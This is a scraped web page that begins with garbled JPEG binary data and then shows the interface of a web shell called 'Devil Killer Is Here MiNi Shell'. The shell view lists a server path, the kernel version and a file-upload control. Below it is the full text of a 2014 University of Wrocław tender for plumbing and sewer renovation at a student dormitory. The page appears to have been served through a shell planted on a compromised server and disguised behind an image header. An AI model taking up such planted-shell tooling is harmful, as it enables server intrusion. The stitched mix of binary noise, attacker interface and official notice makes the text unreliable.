JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/144984-N-2014.html

<p class="kh_header"><b>Wrocław: Roboty budowlane dla dwu zadań:
Zadanie 1: Remont instalacji wodociągowej oraz centralnego ogrzewania w pomieszczeniach węzła cieplnego dla domu studenckiego Ołówek przy pl. Grunwaldzkim 30 we Wrocławiu oraz remont instalacji wodociągowej w pomieszczeniach przyziemia (łącznik).
Zadanie 2: Remont instalacji kanalizacji sanitarnej dla domu studenckiego Ołówek przy pl. Grunwaldzkim 30 we Wrocławiu wraz z pomieszczeniami przyziemia (łącznik).</b><br>
<b>Numer ogłoszenia: 144984 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane dla dwu zadań:
Zadanie 1: Remont instalacji wodociągowej oraz centralnego ogrzewania w pomieszczeniach węzła cieplnego dla domu studenckiego Ołówek przy pl. Grunwaldzkim 30 we Wrocławiu oraz remont instalacji wodociągowej w pomieszczeniach przyziemia (łącznik).
Zadanie 2: Remont instalacji kanalizacji sanitarnej dla domu studenckiego Ołówek przy pl. Grunwaldzkim 30 we Wrocławiu wraz z pomieszczeniami przyziemia (łącznik)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres wykonywania prac budowlanych dla Zadania 1 obejmuje trzy etapy:
I etap: 
- remont instalacji wodociągowej oraz centralnego ogrzewania w pomieszczeniu węzła cieplnego dla II strefy zasilającej dom studencki OŁÓWEK.
II etap: 
- remont instalacji wodociągowej oraz centralnego ogrzewania w pomieszczeniu węzła cieplnego dla I strefy zasilającej dom studencki OŁÓWEK.
III etap: 
- remont instalacji wodociągowej w pomieszczeniach przyziemia ( łącznika ). 

Zakres robót dla Zadania 1 obejmuje wykonanie następujących prac:
a) zabezpieczenie pomieszczeń podczas wykonywania prac ( zabezpieczenie wyposażenia budynku przed zabrudzeniem i zniszczeniem podczas wykonywania prac wraz z udostępnieniem miejsca dla frontu robót),
b) demontaż istniejącej instalacji ,
c) usunięcie gruzu i materiału wymontowanego,
d) montaż nowej instalacji (wymienić całą instalację poziomą wody zimnej, ciepłej, cyrkulacyjnej i centralnego ogrzewania, montaż wodomierzy)
e) montaż 2 wodomierzy na 12 piętrze w D.S. Ołówek.
f) uruchomienie instalacji,
g) próby i testy instalacji,
h) wywóz materiałów z demontażu,
i) wykonanie napraw poinstalacyjnych ścian, stropów, sufitów podwieszanych i posadzek oraz innych zniszczonych podczas prowadzonych prac elementów:
 - po wykonaniu instalacji, należy naprawić wszystkie uszkodzenia elementów budynku 
powstałe w czasie prac, w tym obudowanie pionów płytami g-k oraz ułożenie płytek ceramicznych w miejscach po pracach instalacyjnych, 
 - ubytki ścian i stropów należy wypełnić zaprawą dopuszczoną do stosowania w 
       budownictwie a warstwy wierzchnie wykonać z zachowaniem powierzchni i gładkości nie gorszych od istniejących, 
- ubytki posadzek wypełnić zaprawą dopuszczoną do stosowania w budownictwie a warstwy wierzchnie uzupełnić z zachowaniem technologii wykonania istniejących posadzek, 
- po wykonaniu napraw tynkarskich należy dwukrotnie malować barwą istniejącą miejsca napraw łącznie z najmniejszymi możliwymi do wydzielenia całkowitymi płaszczyznami, 
- przebicia w przegrodach pożarowych wypełnić materiałem o odpowiedniej odporności ogniowej, 
j) inne prace zapewniające kompletność wykonania przedmiotu umowy.
Zadanie 2: Remont instalacji kanalizacji sanitarnej dla domu studenckiego Ołówek przy pl. Grunwaldzkim 30 we Wrocławiu wraz z pomieszczeniami przyziemia (łącznik).

Zakres wykonywania prac budowlanych dla Zadania 2 obejmuje cztery etapy:
I etap:
- remont instalacji kanalizacji sanitarnej (segment 4, 2 piony kanalizacyjne łącznie z przyłączami kanalizacyjnym do studni S2 oraz studni S10) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30 wraz z pomieszczeniami przyziemia oraz przyłącza kanalizacyjnego SVII. Remont przyłącza kanalizacyjnego SVII należy wykonać w terminie 12 - 21.08.2014 r. Prace budowlane należy wykonać wg rysunków nr 1 i nr 2 (załącznik nr 13 do SIWZ
II etap: 
- remont instalacji kanalizacji sanitarnej (segment 4, pozostałe 2 piony kanalizacyjne) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30.
III etap: 
- remont instalacji kanalizacji sanitarnej (segment 3) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30.
IV etap: 
- remont instalacji kanalizacji sanitarnej (segment 1,2) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30.

Zakres robót dla Zadania 2 obejmuje wykonanie następujących prac:
a)	zabezpieczenie pomieszczeń podczas wykonywania prac (zabezpieczenie wyposażenia budynku przed zabrudzeniem i zniszczeniem podczas wykonywania prac wraz z udostępnieniem miejsca dla frontu robót),
b)	 zabezpieczenie pomieszczeń przed dostępem osób trzecich,
c)  wymiana istniejącej instalacji kanalizacyjnej,
d)  usunięcie gruzu i materiału wymontowanego,
e) montaż armatury sanitarnej,
f) przygotowanie ścian pod wykonanie okładzin ceramicznych,
g) wykonanie izolacji przeciwwilgociowej,
h) malowanie
i)  wymiana posadzki w sanitariatach,
j)  odtworzenie ścian szachtów instalacyjnych i okładzin ściennych,
k) próby i testy instalacji,
l) wykonanie robót ziemnych i montażowych związanych z wymianą na nowe odcinków przyłączy kanalizacyjnych,
m) wywóz materiałów z demontażu,
n) wykonanie napraw poinstalacyjnych ścian, stropów, sufitów podwieszanych i posadzek  oraz innych zniszczonych podczas prowadzonych prac elementów:
 - po wykonaniu instalacji, należy naprawić wszystkie uszkodzenia elementów budynku 
powstałe w czasie prac, w tym obudowanie pionów płytami g-k, 
 - ubytki ścian i stropów należy wypełnić zaprawą dopuszczoną do stosowania w 
budownictwie a warstwy wierzchnie wykonać z zachowaniem powierzchni i gładkości nie gorszych od istniejących, 
- ubytki posadzek wypełnić zaprawą dopuszczoną do stosowania w budownictwie a warstwy wierzchnie uzupełnić z zachowaniem technologii wykonania istniejących posadzek, 
- po wykonaniu napraw tynkarskich należy dwukrotnie malować barwą istniejącą miejsca napraw łącznie z najmniejszymi możliwymi do wydzielenia całkowitymi płaszczyznami, kolory ścian i stropów dopasować do istniejących
 - przebicia w przegrodach pożarowych wypełnić materiałem o odpowiedniej odporności ogniowej, 
o) natychmiastowe usunięcie w sposób docelowy wszelkich szkód i awarii spowodowanych przez Wykonawcę w trakcie realizacji robót,
p) inne prace zapewniające kompletność wykonania przedmiotu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości:
Dla Zadania 1:
 - 2 000,00 zł (słownie: dwa tysiące zł).

Dla Zadania 2:
- 20 000,00 zł (dwadzieścia tysięcy zł)
2.Wadium może być wnoszone w jednej lub kilku następujących formach: 
a.	pieniądzu,
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).
3.W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczpospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
- nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedziby;
- określenie wierzytelności, która ma być zabezpieczona gwarancją (poręczeniem);
- kwotę gwarancji (poręczenia);
- termin ważności gwarancji (poręczenia);
- zobowiązanie gwaranta do: zapłacenia kwoty gwarancji (poręczenia) na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż: 
a)Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowna warunkach określonych w ofercie lub
- nie wniósł zabezpieczenia należytego wykonania umowy lub
- zawarcie umowy stało sie niemożliwe z przyczyn leżących po stronie Wykonawcy lub
b) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, nie udowadniając, że wynika to z przyczyn leżących po jego stronie. 
4.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Uniwersytetu Wrocławskiego: 

Bank Zachodni WBK S.A. IV O/ Wrocław
NR KONTA 12 1090 2503 0000 0001 1257 6100
z dopiskiem: wadium na postępowanie nr BZP.2422.3.2014.EH

Wadium w formie pieniężnej winno znaleźć się na wskazanym rachunku Zamawiającego do upływu składania terminu ofert. Wadium wniesione w pieniądzu uznaje się za wniesione z chwilą jego wpłynięcia na wskazane konto Zamawiającego. Dowód wpłaty należy przedstawić w formie dołączonej do oferty kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem.
5.Pozostałe niepieniężne formy wadium, winny być złożone w oryginale w Kwesturze Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 1 we Wrocławiu (Dział Finansowy pok. Nr 108, I piętro, okienko nr 1) do upływu terminu składania ofert.   Kopię należy dołączyć do oferty.
6.Wadium winno obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykonali, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
Zadanie 1:
- co najmniej jedną robotę budowlaną o wartości nie mniejszej niż 50 000,00 zł brutto obejmującą, co najmniej wykonanie instalacji centralnego ogrzewania i instalacji wodociągowej.

Zadanie 2:
- co najmniej dwie roboty budowlane o wartości nie mniejszej niż 400 000,00 zł brutto każda obejmujące co najmniej wykonanie instalacji sanitarnej, przy czym przynajmniej jedna z robót powinna być wykonana w budynku zamieszkania zbiorowego*, podczas ciągłego tj. trwającego 24h/dobę ruchu mieszkańców.

Zamawiający zastrzega, że są to najważniejsze roboty, jakie powinien wykazać Wykonawca. 

Jeżeli robota wskazana w wykazie spełnia warunki szczegółowe dla obu zadań i obejmuje łącznie zakresy, co do wartości i rodzaju, wskazane dla Zadania 1 oraz dla Zadania 2, Wykonawca może wykazać się jej wykonaniem w odniesieniu do obu zadań. 

W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V w pkt 1 ppkt 1 i 2 SIWZ.
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia-nie spełnia. 
  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy spełnia go co najmniej jeden podmiot składający ofertę lub podmioty spełniają go łącznie.
Do przeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kurs przeliczeniowy przyjmie średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym: http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html

*budynek zamieszkania zbiorowego - należy przez to rozumieć budynek przeznaczony do okresowego pobytu ludzi, w szczególności hotel, motel, pensjonat, dom wypoczynkowy, dom wycieczkowy, schronisko młodzieżowe, schronisko, internat, dom studencki, budynek koszarowy, budynek zakwaterowania na terenie zakładu karnego, aresztu śledczego, zakładu poprawczego, schroniska dla nieletnich, a także budynek do stałego pobytu ludzi, w szczególności dom dziecka, dom rencistów i dom zakonny (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie Warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. nr 75 poz. 690 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane (Dz. U. z 2010 r. nr 243, poz. 1623 z póź.zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych:
Zadanie 1:
kierownik robót sanitarnych posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej co najmniej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - bez ograniczeń.

Zadanie 2:
a)	kierownik robót sanitarnych posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej co najmniej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - bez ograniczeń;
b)	kierownik robót budowlanych posiadający uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - bez ograniczeń.

Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V w pkt 1 ppkt. 1, 3 i 4 SIWZ.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy spełnia go co najmniej jeden podmiot składający ofertę lub podmioty spełniają go łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1: 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zadanie 2:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 500 000 zł (pięćset tysięcy zł) lub równowartość w walucie.
W przypadku złożenia przez Wykonawców dokumentów zawierających dane finansowe w innej walucie niż PLN Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP z dnia opublikowania ogłoszenia, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym: http://www.nbp.pl/home.aspx?.f=/kursy/kursy.htm 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy spełnia go co najmniej jeden podmiot składający wspólną ofertę lub podmioty spełniają go łącznie.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V pkt 1 ppkt 1 i 5 SIWZ.
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wskazać: 
Zadanie 1:
- co najmniej jedną robotę budowlaną o wartości nie mniejszej niż 50 000,00 zł brutto obejmującą, co najmniej wykonanie instalacji centralnego ogrzewania i instalacji wodociągowej.

Zadanie 2:
- co najmniej dwie roboty budowlane o wartości nie mniejszej niż 400 000,00 zł brutto każda obejmujące co najmniej wykonanie instalacji sanitarnej, przy czym przynajmniej jedna z robót powinna być wykonana w budynku zamieszkania zbiorowego*
Zamawiający zastrzega, że są to najważniejsze roboty, jakie powinien wykazać Wykonawca. 
Jeżeli robota wskazana w wykazie spełnia warunki szczegółowe dla obu zadań i obejmuje łącznie zakresy, co do wartości i rodzaju, wskazane dla Zadania 1 oraz dla Zadania 2, Wykonawca może wykazać się jej wykonaniem w odniesieniu do obu zadań.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz Oferty - załącznik nr 1 do SIWZ;
2)Kosztorys ofertowy - osobno dla Zadania 1 i Zadania 2;
3)Dowód wniesienia wadium (dla Zadania 1 i Zadania 2);
